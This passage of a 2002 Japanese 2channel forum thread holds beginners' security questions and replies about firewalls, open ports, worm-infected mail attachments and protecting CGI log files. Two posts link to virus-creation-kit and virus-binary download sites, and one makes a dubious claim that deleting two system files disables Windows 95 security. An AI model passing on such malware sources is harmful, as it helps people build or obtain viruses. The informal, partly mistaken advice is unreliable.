 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 
―――――――――――――‐┬┘ 
                        |  
       ____.____    |   
     |        |        |   |   
     |        | ∧_∧ |   |  
     |        |( ´∀`)つ ミ | . ┌=====┐
     |        |/ ⊃  ノ |   |  ‖     ‖
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |  ‖___ ‖
                       └-──┘


286 :名無しさん@お腹いっぱい。:02/01/20 15:36
>>285
禿げしくワラタ


287 :コピペ花子:02/01/20 17:27
誰か助けて!このままじゃ今日も眠れないよう。。
串をちゃんと刺せません!(逆ギレ気味)
詳しく手取り足取り教えてぐだざい〜

環境は
WINDOWS98 IE6 ダイヤルアップ接続 ファイヤーオール有効
初心者のくせにプロキシランチャー、DLしてみたけど余計にこんがらがった。

通常の接続しないにチェック
LAN設定ーアドレス・ポート入力ー詳細設定したです。串リストから。
診断する串経由になってません???なぜ???
なにがどういけないのかさえも分かってません。
ファイアーオールがProxy〜をインバウンド遮断が原因ですか?

288 :名無しさん@お腹いっぱい。:02/01/20 17:40
>>239 さん
私は別スレに同じ事書いた者です。
もしかして、BEA-NETに登録してませんか?
BEAに問合せた結果
ウィルスが送信元であるBEAの緊急用メールアドレスに送信
されてしまいました。
たまたま緊急用メールシステムが、その緊急用メールアドレスにメー
ルを送ると、登録された会員全員にメールを配信する設定になってい
たため、結果的に多くの会員の方に、ウィルス添付メールを含む覚え
のないメールが送信されるという事故が発生致しました。

だから気にする事ないよー
東条も自分で出したメールを受け取っているだろーから


289 :まかひーFW:02/01/20 17:52
例によってマカに困ったことが発生致しました。

★マカフィーファイアーウォールは不正なアクセスにより
書き換えられました。・・・というような一文(警告?)が。
あわててFWのログを見ると、確かにダイアルアップのネットBIOSを
承認するに書き換えられております。
ダイアルアップ接続じゃないので、そこは何にもチェックいれていなか
ったのですが、これはヤバイ状況なのでしょうか?
あまりにも自分が厨房くさくてここで質問するのも恥ずかしいのですが
よくわからないというのが現状です。
そしてそんなに簡単に書き換えができるんじゃFWの意味がない・・・
或いは自分の設定の仕方に明らかなミスがあるのでしょうか?
気になるともう眠れません(><)
とりあえず人工が多そうなココで。

290 : :02/01/20 18:40
>>289
マカフィーやめればいいのに

291 :名無しさん@お腹いっぱい。:02/01/20 18:58
まかからの乗り換え先ってどこが一番多いんだろう?
自分はばすたーだけど

292 : :02/01/20 22:26
>>291
全然根拠なしだけど、ノートンとトレンドマイクロ半々ぐらい?
あと、若干が無料で使えるのとか少数派に流れるぐらい?

293 :コピペ花子:02/01/20 22:47
>>289さん

自分も最初マカフィだったけど最新の定義する時に停止しまくり。
良い噂もあまり聞かなかったんでノートンにしました。イイ!YO。

って誰か俺の>>287質問に答えておくれーー!!

環境は
WINDOWS98 IE6 ダイヤルアップ接続 ファイヤーオール有効
初心者のくせにプロキシランチャー、DLしてみたけど余計にこんがらがった。

通常の接続しないにチェック
LAN設定ーアドレス・ポート入力ー詳細設定したです。串リストから。
診断する串経由になってません???なぜ???
なにがどういけないのかさえも分かってません。
ファイアーオールがProxy〜をインバウンド遮断が原因ですか?
詳しく教えてください。


294 :名無しさん@お腹いっぱい。:02/01/20 23:48
wyvern-2.0-PR06.tar.gzというファイルがウィルス(Unix.Penguin)に
感染してたのですが、らるちーで解凍しようと思ったらDLLがなかったので
解凍できずに中を覗いただけでした。
これって、感染したのでしょうか? 大丈夫なのでしょうか?

295 :名無しさん@お腹いっぱい。:02/01/20 23:51
>>294
らるちーって、LINUX版有ったの??


296 :コピペ花子:02/01/20 23:52
http://security1.norton.com/ssc/home.asp?j=0&langid=jp&venid=sym&plfid=20&pkj=OYDCTGXIBVEMBQAUWZK

297 :名無しさん@お腹いっぱい。:02/01/20 23:53
ファイルローグというソフトをつかってて、次回起動させたら
windowsに記憶させてあるはずのパスワードがすべて消えていました。
これは侵入されたということなのでしょうか?
また、侵入されてた場合にどのような被害が考えられますか?

298 :ともこ:02/01/20 23:56
ノートンインターネットセキュリティを使っています。
アラートトラッカーにサブセブンで攻撃されてるとかって出たらどうすればいいんですか。
もう初心者なもので何もわかんないです。
お願いします

299 :ななし:02/01/21 00:00
>297
それだけじゃ判らん
>298
インバウンドをブロックしたとか遮断した、とか
書いていない?
そう書いてあれば問題ない。放置して可

300 :名無しさん@お腹いっぱい。:02/01/21 00:00
>>294
つか、それ置いてあるディレクトリまで移動したら、
$ gunzip wyvern-2.0-PR06.tar.gz
すれば、解凍できるよ。
後は、$ tar xvf ね。知ってると思うけど。
DLL??

301 :297:02/01/21 00:10
>299
初心者なので具体的に何を書けばわからないのですが?
すみません。

302 :299:02/01/21 00:16
>301
OSの種類 やウィルスチェックはしたかどうか、
そもそもファイルローグで、何をしていたのか、などなどあるが、
初級ネット板にマルチポストしたので相手にしない。

心配なら、明日お店に行って、ファイアウォールソフト買って来なさい。

303 :297:02/01/21 00:20
すみません。マルチポストという言葉も始めて聞いたもので。
これぐらいの初心者なのですが。
windows98でファイルローグで音楽落としてました。
ウイルスチェックはしましたが大丈夫でした。

304 :294:02/01/21 00:29
>>300
あっ、スイマセン。
説明が不十分でしたね。
私が言いたかったのは、圧縮ファイルがウィルスの場合、
解凍しなくても感染したことになるのかを聞きたかったのです。

305 :300:02/01/21 00:41
>>304
解凍しなければ大丈夫です。但し、アンチウイルスはほぼ圧縮ファイルも
スキャン対象なので検出はします。
つか、tar.gzでwinのファイル圧縮する人って結構居るのかな。。。

306 :名無しさん@お腹いっぱい。:02/01/21 01:30
突然ファイアー(ゾヌ)が
RUN a DLL as an App てをブロックしたんだが、なんだろこれ?
最近ノックされる回数が増えてます。気持ち悪いです。


307 :名無しさん@お腹いっぱい。:02/01/21 01:54
圧縮ファイルを解凍しただけで感染するん?

308 : :02/01/21 01:55
----VE7G9MZO1
Content-Type: application/octet-stream; name="AJJAJIAJ.EXE"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AJJAJIAJ.EXE"

これなんですかね
件名無しのメールにひっついてました
こわくてあけてません

309 : :02/01/21 02:03
>308
添付ファイルの前2文字と後ろ2文字が同じ=ハイブリスの可能性大
捨てた方が吉

310 :初心者:02/01/21 02:50
セキュリティ チェックサイト Shields UP !でチェックしたら
port139 NetBIOSと port5000UPnpがOPEN!だった・・・
これって大丈夫なんですか?
大丈夫じゃないような気がするんですけど。
OSはMeです。

311 :名無しさん@お腹いっぱい。:02/01/21 03:01
既出だけど。
http://www.personalfirewalljapan.com/solution/bios9x.htm
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-059
UPnPのほうはパッチ意味ないかもしれない。どうせ使わないからアプリケーション追加削除から
チェックはずしていいんじゃない?


312 :308:02/01/21 03:06
ども

313 :310:02/01/21 03:27
>311
レスありがとうございます。

314 :Virus Creation Tools (54) :02/01/21 03:52
http://vx.netlux.org/dat/vct.shtml
ウイルス250種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf


315 :名無しさん@お腹いっぱい。:02/01/21 10:19
オンラインのウィルスチェックってメールもチェックしてくれるの?
なんかウィルスメールっぽいの受信して開けられず(プレビューもできず)
です。
添付があって、件名と送信者が文字化けしてます。

316 :col:02/01/21 10:37
>>315
オンラインチェックはよく分からんのですが
修正モジュールを適用していればプレビューしても感染しません。
もちろんHTMLメールを表示しない設定にしていればの話ですがね。

オンラインチェックはPOPだとチェックしてくれるんじゃなかろうか?
IMAPだとどう考えても無理っぽいよね。
この辺誰か詳しい方のレス希望。

317 :名無しさん@お腹いっぱい。:02/01/21 11:02
>>316
一応、まだメールを開いてない状態で
シマンテックのオンラインスキャンをして感染ゼロでした。
感染したあとじゃないと検出してくれないのかな?

318 :ど素人:02/01/21 11:13
WINMXもしくはファイルローグを使用してて、
パスワードファイルが外部から破壊されることはあり得るのでしょうか?
OSは98で、ADSL接続ルータタイプのモデムを使用しております。
ファイアーウォールソフトは導入しておりません。
宜しくお願いいたします。

319 :col:02/01/21 11:19
>>317
何を根拠にウィルスメールっぽいといっているのか
気になるところではありますが。
WindowsUpdate等で修正モジュール当ててメール読んでみたらいかが?
メールを読んで必要のないものなら破棄すればよいでしょう。
冷たいようですが、そのくらいのことができる知識が無いのならば
ウィルス対策ソフトを購入することをお勧めします。

320 :名無しさん@お腹いっぱい。:02/01/21 11:21
Windows95のセキュリティ破壊

Systray.exeとwininit.exeを削除して再起動するとセキュリティはなくなる。


321 :名無しさん@お腹いっぱい。:02/01/21 11:26
>>319
そりゃ、買うよ。
でも今は現実にNAVが入ってないの?
そっから話できんかな?

322 :col:02/01/21 11:28
>>318
WinMXはIPアドレスがわかってしまうので狙い撃ちは可能です。
が、Cドライブを共有していたりしない限り簡単にやられることはないかと。


323 :col:02/01/21 11:37
>>321
初めにも言いましたが、オンラインチェックの仕様がよく分からないので
はっきりしたことがいえません。
POPでメールと添付ファイルがローカルディスクに落ちていれば有効だとは思いますが
確証が得られません。
なので、メールソフトはOutlookExpressを使用していると仮定して
修正モジュールを適用してメールを見ただけで感染する状況を防いだ上で
メールを見て判断すべきだと思います。
ということを言いたかったのです。つたない文で申し訳ない。

324 :名無しさん@お腹いっぱい。:02/01/21 13:16
>>310
NetBIOSがOPENなんて最悪。
閉じときなさい。んで、Freeのでもいからファイヤーウォール入れとけ。

325 :ともこ:02/01/21 13:28
>>299
レスありがとうございました。ブロックとかになってましたです。

あと、ワタシもシールズアップのポートプローブやったんですが、SMTPとUPnPが開いてました。
UPnPのほうはそのページの手順に従ってソフトDLしてすぐ閉じれたんですが、SMTPはどうなんでしょう。
これは開いたままでもいいものなんですか?

326 :名無しさん@お腹いっぱい。:02/01/21 16:49
この間、とある板のメール欄を何気なくクリックしてみたら
なんと自分の氏名が書いてあったんです。
そして今日同じ所に行ってみると、そのメール欄は緑なっていて
何も見えなくなっていました。
これはどういうことなのでしょうか?


327 : :02/01/21 17:53
>>326
クッキーとかオートコンプリートのせい
気にするな

328 :名無しさん@お腹いっぱい。:02/01/21 18:05
 


329 :JS.Exception.Exploit :02/01/21 20:03
に感染したんですが、ファイルの場所がわかりません。検索しても出てこないんですがどうなってるんでしょう。
--------------
C:\Documents and Settings\user\Local Settings
\Temporary Internet Files\Content.IE5\LOCNXLG9\15[1].htm
は次のウィルスに感染しています: JS.Exception.Exploit
---------------
15[1].htmを削除すればいいみたいですがファイルが見つかりません。
userフォルダの中にLocal Settingsというフォルダも存在しません。
見えてないだけなんでしょうか?

330 :326:02/01/21 20:04
>>327
返答ありがとうございます。
あと、気にするなって事は、やはり情報を
抜かれてしまっているってことなのでしょうか?


331 : :02/01/21 20:08
★必見★
パチマガで池上蓮から「旧友の自殺狂言騒動に抑えきれない嫌悪感」
で晒された本人(謎の人物)が池上に対して怒りまくってるぞ!!

謎の人物ホームページ↓
http://www.geocities.co.jp/Bookend-Hemingway/4715/

関連スレッド
謎の人物公式スレッド↓
http://kaba.2ch.net/test/read.cgi/pachi/1009686980/l50

332 :名無しさん@お腹いっぱい。:02/01/21 21:42
>>330
抜かれていない。きみのPCの中の情報をきみのPCが表示しただけ。

333 :名無しさん@お腹いっぱい。:02/01/21 21:59
NIS2002を入れてます。
攻撃を受けた場合、IPから何処の串かまでは、
解るようになったんですが、相手を特定できるまでの
スキルがありません。どうやれば、相手を特定できますか?

334 :名無しさん@お腹いっぱい。:02/01/21 22:03
ページによって、URLがjavascript:openPWin()となって見れません。。
どうすればいいんですか?教えてください、、。

335 :名無しさん@お腹いっぱい。:02/01/21 22:10
netstat -tをすると
tcp 1 0 xxxx:1170 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1169 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1168 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1167 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1166 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1165 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1164 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1163 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 0 0 localhost:5680 localhost:1090 ESTABLISHED
tcp 0 0 localhost:1090 localhost:5680 ESTABLISHED
ってでて来るんですがポートスキャン食らってますか?
どう対処すればいいんでしょう?

336 :名無しさん@お腹いっぱい。:02/01/21 22:13
こちらへどうぞ
http://pc.2ch.net/pcqa/

337 :墓守:02/01/21 22:18
>>335
LANなら起動直後、モデムならトップページ表示後にクローズして、しばらくたってからもう一度。

338 : :02/01/21 22:26
http://choco.2ch.net/test/read.cgi/news/1011361670/-100
これを解説してください。

339 :名無しさん@お腹いっぱい。:02/01/21 22:27
かなり前に開いたページなんですがずいぶん長い間
残ってるもんですね

340 :名無しさん@お腹いっぱい。:02/01/21 22:42
なんか良く分かりませんがモジラがWindowもないのに固まってました モジラがCPUを50%近く占有してました。killしたら上の netstat -t は消えました これって良く有ること何でしょうか?

341 :初(小)心者:02/01/21 22:45
Yahoo!BBから接続してるのですが、どうもgoogleが表示できません。
(トップページ以下すべて。google.co.jp google.comとも)

Web上で話題にもなってないし、間違いなく自分だけに起こってる現象
(若しくはY!BBユーザのみ??)だろうとおもっております。

Y!BBユーザーだから締め出されてるのか??とも思いますが、
知り合いはY!BBで閲覧できてるみたいです。

CookieやらActiveXやらJavaなどの表示・受け入れ設定などは素人
ですが本で読んで分かる範囲ならきちんと設定できている・・・はずです。

スパイソフトでは?などと思い、Ad-awareなるソフトでチェック
もしてみましたが見つけられませんでした。

Symantecのオンラインセキュリティチェックを実行して、開いている
ポートがあったのであわててパーソナルファイアウォールの体験版を
臨時であてましたが、googleは表示できません。侵入も検出してません。


そこで質問なのですが、特定の人が特定のサイトを表示できないように
することは、スパイソフトやコンピュータへの侵入以外で可能なの
でしょうか。可能ならば、その方法や対処法を教えていただけませんで
しょうか。(対処法だけでも、ありがたいです。)

これまでの文面をお読みいただければわかってもらえるかもしれま
せんが、あまりスリルを楽しんだりするのが好きなわけではないので、
アングラサイトとかは見てません。2Chに来たのも正直言って検索サイト
が使えないとどうしようもなくなってしまったからです。

*メールも、HTML非表示はもちろん、実行可能タグとかも無効
 にしております。

インターネット歴は長めですが、セキュリティについてそれほど真剣に考えて
いなかったことを後悔しております。いきなりのADSLで、知識も初心者なので
みなさまの助言いただきたく思います。


342 :IPアドレス:02/01/21 23:26
ある掲示板に書き込みをしたところ、他の人間とIPアドレスが全く一致したことがありました。
このようなことは、可能性としてありえるのでしょうか?

ちなみに私はダイヤルアップ接続です。

1.偶然一致することはありえるのか?
2.偶然以外で考えられる可能性は何か?

非常に気になっています。どなたか親切な方、教えて下さい。

343 :墓守:02/01/21 23:31
>>342
地域BBS(オフ系)で、一度他人とかぶったことがあります。
そんなものです。

344 :名無しさん@お腹いっぱい。:02/01/21 23:33
>>342
>1.偶然一致することはありえるのか?
ありますよ。

>2.偶然以外で考えられる可能性は何か?
・同じproxyサーバーを経由して書き込んだ。
・偶然同じIPアドレスを割り当てられた。(要時間差)
>>342は日頃から見えない物が見える。

345 :名無しさん@お腹いっぱい。:02/01/22 00:06
なんか今晩立て続けにノックされてる感じ。
中国と香港からだった。
なんか、やだなあ。
ゾヌが防いでくれたらしいんですけど。
なんか気をつけることってありますか?
IEのセキュリティ・ホールは、いちおうふさいでると思うんですが…

346 :(;´Д`)ドキドキ…:02/01/22 00:09
>>345
インターネットを使わないときは回線を切るなど・・・。

>IEのセキュリティ・ホールは、いちおうふさいでると思うんですが…
塞いでも塞いでも穴が見付かるのが世の常です。

347 :IPアドレス:02/01/22 00:11
>343
>344

どうもありがとうございました。参考にします。

348 :345:02/01/22 00:26
>346
じつに含蓄あるお言葉です。
身にしみました。
>塞いでも塞いでも穴が見付かるのが世の常です。
>塞いでも塞いでも穴が見付かるのが世の常です。
…M$にも教えてやりたいと思います。
あと、ahooBBにも。
いままでほとんどゾヌが働かなかったのに、今日は大活躍…。



349 :名無しさん@お腹いっぱい。:02/01/22 00:35
>>341
↓とりあえずこの辺の設定はどんな感じですか?

【Googleのキャッシュ】
http://www.google.com/search?q=cache:dTtjU2raEQUC:mroom.cool.ne.jp/bb/adsl83.html+Yahoo+BB+%81%40%93%C1%92%E8%82%CC%83T%83C%83g%81%40%90%DA%91%B1&hl=ja&lr=lang_ja

【元のページ】
http://mroom.cool.ne.jp/bb/adsl83.html

ところで、使用しているパソコンの「OS」、「ブラウザ」、「ルーター」の種類がわかれば、もっと意見が集まるのでは。

350 :未知のウイルス:02/01/22 02:14
http://vx.netlux.org/dat/vct.shtml
ウイルス250種

http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString
(右端の上から6番目)
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

351 :名無し:02/01/22 02:29
スレ違いかもしれないけど、
他人のPCに侵入するのって犯罪にならないんですかね?
(最近侵入されて色々情報をぬかれた・・トホホ)

352 :_:02/01/22 04:37
ノートン先生のインターネット・セキュリティ2002を使ってます。
2ヶ月ほど前にADSLをブリッジタイプからルータータイプに変えま
した。ブリッジの頃は頻繁に不正侵入だかなんだか外部からアタ
ックを受けていましたが、ルーターにしてからはぜんぜんアタック
されないです。ルーターはセキュリティ高いってのがよくわかりま
した。インターネット・セキュリティはアンインストしてもいーすかね
?トロイの木馬もアンチ・ウィルスが発見してくれると思うんすけど
・・・どーですか?

353 :  :02/01/22 06:01
142のカキコみてて思ったんですけど割れたものに限らず
ノートンとかウイルスバスターとかってアップデートする
とき以外に個人の情報とか勝手に送っているんですか?
送ってないならアップデートしない限り割れたもの使ってても
ばれないよね?  え〜と詳しい人オシエテください。


354 :名無しさん@お腹いっぱい。:02/01/22 06:13
EXIT KILLER ポップアップ ターミネーター
これって何?

355 : :02/01/22 06:15
>>351
犯罪だ 法律ができた

>>352
そのままにしておけ
ルーターを過信しすぎるのはよくない

>>353
割れた物を使ってるやつにコメントはしない
去れ 犯罪者



356 :名無しさん@お腹いっぱい。:02/01/22 06:16
>>354
分からない用語は辞書でもみて調べろ

357 :353:02/01/22 07:10
>>353
割れた物を使ってるやつにコメントはしない
去れ 犯罪者

オイラは割れた物は使ってないよ。
オイラが聞きたかったことはノートンなどのソフト
(シェア フリーを問わず)を使ってて自分以外の
第三者が使ってるのを知りえるのか?ということが知りたかったんで・・・
聞いてはいけないことだったらスマソ。


358 :名無しさん@お腹いっぱい。:02/01/22 07:14
>>357
だからお前は使う予定があるんだろ? >>353でそう書いてある
ノートンはシェアでもフリーでもない 製品だ


359 :なんじゃ こりゃ?:02/01/22 07:44
日付: 02/01/22 時刻: 7:41:44
今回 1 回だけユーザーが選択したのは 「ブロック」 通信。 詳細:
インバウンド ICMP 要求
リモートアドレス、サービスは www.google.com,http
プロセス名は XタpツXタpツ

360 :名無しさん@お腹いっぱい。:02/01/22 13:48
掲示板の荒らしを懲らしめる方法ってないですか?管理者が行方不明で利用者
である僕の立場じゃどうしようもなくて困ってます。

361 :  :02/01/22 13:57
単なる利用者ごときに無理>360

362 :初(小)心者:02/01/22 15:50
>>341

アドバイスどうもありがとうございます。MTU値などはリスクが大きいと思い、
いじっていませんでした。(セキュリティ板とは違う話題かも知れないですが、
普通の状態で3Mでているので、もっと悲惨な速度の人もいるようなので
これはこれで満足しております。)

OSはWinMeです。
*家にあるWin98デスクトップでも表示できませんでした。

ブラウザはIE6です
*N6でもだめでした。

ルータは設置していませんでした。しかしセキュリティについて調べて今の状態が
あまりに危険だと判断したため、簡易ファイヤーウォール機能付きでも急いで導入
しようとおもっております。coregaのCG-BARSW4PPROを購入しようと考えております。

*余談ですがこのルータ、あるサイトで、セキュリティ設定が貧弱などと
 叩かれておりました。この点について、詳しく知っておられる方、よければ
 教えていただけないでしょうか。またセキュリティ面でオススメのルータ等
 があればよろしくお願いします。以上身勝手な相談でした。

リストラ予備軍ですので仕事中はあまりWeb見られなくて、調べが足りない
点あるとおもいますが、ご了承ください。


363 :初(小)心者:02/01/22 15:53
>>349
の方、アドバイスどうもありがとうございます。

364 :名無しさん@お腹いっぱい。:02/01/22 16:25
初心者たんにはこれをお奨めしたい

http://aterm.cplaza.ne.jp/broadband/index.html

365 :名無しさん@お腹いっぱい。:02/01/22 18:07
snortのログ。
123.456.789.10(相手のホスト;架空のIP)から987.654.321.000(自分のホスト;架空のIP)に攻撃?

Jan 20 01:47:00 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:47:12 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:47:36 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:48:24 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:49:51 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:00 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:12 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:36 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:51:24 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:29:26 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:29:38 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:30:02 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:30:50 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:17 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:26 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:38 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:33:02 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:33:50 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS

板違いorスレ違いだったらすんません。

366 : :02/01/22 19:02
すみません、書き込みするときにブラウザが変ですよ
と出ます。ノートンが原因だと思うのですが無効にしても
直りません。解決策は無いでしょうか?

367 : :02/01/22 19:06
>>366
ノートン関係のスレ見てみそ。ズバリのスレタイトルすらあるぞ。

368 :初(小)心者:02/01/22 22:04
昨日、googleが表示できないと投稿した者です。
今日、どうしても問題が解決しないのでいろいろとチェックして
いたんですが、(たぶん)保存されたCookieを全部削除したあと
表示してみたら、ちゃんと表示できました。

一応これで問題は解決しましたが、この板を読んでいてセキュリティ
の大切さを初めて痛感しました。これからファイヤーウォールソフトや
ルーターやら導入して、ちゃんと勉強して出直してきます。

レスをくれた2人(?)の方、ありがとうございました。今度はこちらから
初心者にアドバイスできるぐらいまで勉強して戻って来ます。

それでは。

369 :名無しさん@お腹いっぱい。:02/01/22 22:28
>368
どのぐらい溜めてたんだろ。。。

370 :ドキンちゃん:02/01/23 05:55
>>353
読みなよ。
http://www.nda.co.jp/himichu/6.html

371 :名無しさん@お腹いっぱい。:02/01/23 13:27
ウイルスバスター2002でやってみたところ
WORM_SKA.DLL
WORM_SKA.A
WORM_SKA.WSOCK32
というウイルスが見つかって駆除ツールとかやってみましたが
どうもならないので手動で消すやり方でやっても
システムが使用中だから消せないってでます。
その場合はセーフモードでしてくださいと書いてあったので
そうしたのですが使用中で消せないってまたでます。
Meなんですけどどうしたらよいか教えていただけないでしょうか。

372 :名無しさん@お腹いっぱい。:02/01/23 13:52
>>371
起動ディスク使え〜〜〜〜〜

373 :お願いします。:02/01/23 14:33
>>ALL
IE5.5の「ホームページ」の設定が、PCを再起動するたびに
架空の固定サイト「アドレス自体はもう存在しないです。」に設定されていまします。
オプションで「空白のページ」や「別の既存のサイト」を指定しても再起動すると、
先の固定のサイトに設定されてしまします。どうしたら通常にもどるでしょうか?
OS:Win2000Pro/SP2
IE:5.5/SP2
の構成です。

374 :嫌です。:02/01/23 14:56
適当なウィルス対策ソフト買ってきなさい。

375 :名無しさん@お腹いっぱい。:02/01/23 16:08
66.150.5.36って何でしょうか?IPドメインサーチ
してもよくわからないんですが・・。
この前何気にnetstat -aやってみたらかなり長い時間接続中に
なってたんですが。どなたか教えていただけないでしょうか。
ちなみに相手のポート80に繋がってました。変なサイトなんか逝ってないんですが・・。

376 :名無しさん@お腹いっぱい。:02/01/23 17:12
>>375 サム君で調べろ。http://www.samspade.org/

377 :名無しさん@お腹いっぱい。:02/01/23 17:22
>>373
http://homepage2.nifty.com/winfaq/c/ietrouble.html#370
を見よ。

378 :     :02/01/23 22:10
質問させていただきます。
このたびレンタルサーバを借りてウェブページを開設しました。
そこで閲覧者に見られたくないファイル(cgiのログファイル等)があ
るのですが、これはパーミッションを設定すれば見られないようにでき
るのでしょうか?また、見られたくないファイルを特定のフォルダにま
とめておいてそのフォルダの中身全体を見られないようにするにはどう
すればいいのでしょうか?

板違いだったらすいません

379 :名無しさん@お腹いっぱい。:02/01/23 22:14
ここで質問するのが最も遠回りな気が…

380 :(;´Д`)ドキドキ…:02/01/23 22:40
>>378
>閲覧者に見られたくないファイル(cgiのログファイル等)があ
>るのですが、これはパーミッションを設定すれば見られないようにでき
>るのでしょうか?
ログファイル拡張子を*.cgiにしてあげれば、まっとうには見れませんですよ。
でも、お使いのCGIが汚染チェックを怠っていたりすると、
場合によっては意味が無いです、ええ。そればかりか致命的なアレでナニされます。

>フォルダの中身全体を見られないようにするには
.htaccessで、ええ。自分で調べてください。簡単ですから。

381 :名無しさん@お腹いっぱい。:02/01/23 23:26
Badtransスレで活躍してたネット屋は最近この板きてますか?

382 :    :02/01/24 00:40
>380さん
ありがとうございます。自分はあまりUnixいじったことがな
くて、パーミッションの認識がどうもあいまいです。
サイト閲覧者のもつファイルへのアクセス権とそのファイルのパ
ーミッションとは関係があるのでしょうか?
それとも.htaccessでフォルダごと制限するしかないのでしょうか?

わけのわからないこと言ってるかもしれないですがよろしくおねがいします





383 :名無しさん@お腹いっぱい。:02/01/24 01:19
便乗質問させて下さい。俺の借りてるサーバは.htaccess置けないんですが、
こういう場合はどうすればいいんでしょう?

384 :名無しさん@お腹いっぱい。:02/01/24 01:26
>>382
アクセス権の設定=パーミッションの設定

>>383
あきらめて別のサーバにしなさい

385 :(;´Д`)ドキドキ…:02/01/24 01:38
>>382
ログファイルは読み書きできないといけないからパーミッション606(666)。
・・・・・・。
はえー話が、これだとブラウザにログのファイル名ぶち込めば中身が見えます。
つべこべ言わずにログファイルの拡張子を*.cgiに。
ブラウザで直接アクセスするとInternal Server Errorが返ってきて (←要・デーモンがcgiをアレとして認識してること)
中が見れなくなります。CGIからは普通に扱えます。
.htaccessはフォルダにぶち込みます。これで幸せになれます。(;´Д`)アーメソ
CGIにも何にも使わないんなら最初からアップしない事です。

>>383
気休めに、見られたくないフォルダに空っぽのindex.htmlでも置いてちょ。
で、推察され難いファイル名(パスワードのような、英数字8文字程度)にして
勘の良い客が訪れない事を祈りましょう。(;´Д`)アーメソ

386 :名無しさん@お腹いっぱい。:02/01/24 01:43
ウィルスの質問でニフの会員なのですが
『「ウイルスバスター for @nifty Mail」は、あなたが送信したメールの
添付ファイルが、コンピュータウイルスに感染している恐れがあることを
感知しました。

メールの送信先 :(自分のメルアド)
添付ファイル名 : SETUP.DOC.scr
コンピューターウイルス: WORM_BADTRANS.B

ご利用のコンピュータがウイルスに感染していないか、ウイルス検出ソ
フトでご確認することをお勧めします。

ウイルスバスター for @nifty Mail
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
こういう警告がきましたがこのウィルスは窓だけではないかな〜?
と思ったのです。私はマック初心者なのですが。
それでウィルスバスター(会員用)やってますがHPみたらこの
メッセージは非会員向けのものらしくて…。
ニフに問い合わせメールしたいのですが質問送信フォームとか見当たらない
のです。どうしたらいいのか…;

387 :名無しさん@お腹いっぱい。:02/01/24 01:48
>>386
バッドトランスはマックには感染しない
マック用のウイルスバスター製品は販売されてない

メール送信元に心当たりがなければ削除すればよい

388 :名無しさん@お腹いっぱい。:02/01/24 01:57
みなさんのオススメのフリーなfirewallを教えてください。

389 :名無しさん@お腹いっぱい。:02/01/24 01:59
>>388
ゾーンアラーム

390 :名無しさん@お腹いっぱい。:02/01/24 02:03
>>389
やっぱりゾーンアラームは使いやすいですか。
他にはなにかありますか?

391 :名無しさん@お腹いっぱい。:02/01/24 02:29
>>385
>ログファイルは読み書きできないといけないからパーミッション606(666)。

ん? これってどんな状況なん?
CGIが参照してHTML生成するなら単に600で良いんでは?
これだったら、ブラウザで直接参照できないよ。

392 :(;´Д`)ドキドキ…:02/01/24 02:40
>>391
そうでした・・・っけ?
(;´Д`) <オイラ、自信無しです。ここんとこ、とんとCGI弄ってないもんで。

いや、失礼しました。600で大丈夫なら600で。

393 :(;´Д`)ドキドキ…:02/01/24 02:50
ちょっち検証したところ、CGIがオーナー権限で動くなら600でも読み書きできますんけど、
ユーザー権限で動くときは606でないと読めなかったです。

必要に応じて設定してください ってことで。

394 :391:02/01/24 02:52
いやその…、そういや俺も自信なしだ。
レンタル鯖によっちゃCGIのアクセス権設定が違うかも?

395 :391:02/01/24 04:34
>>393
あ…やっぱり権限によって違ったか。スマソ
永遠の眠りについてきます…。

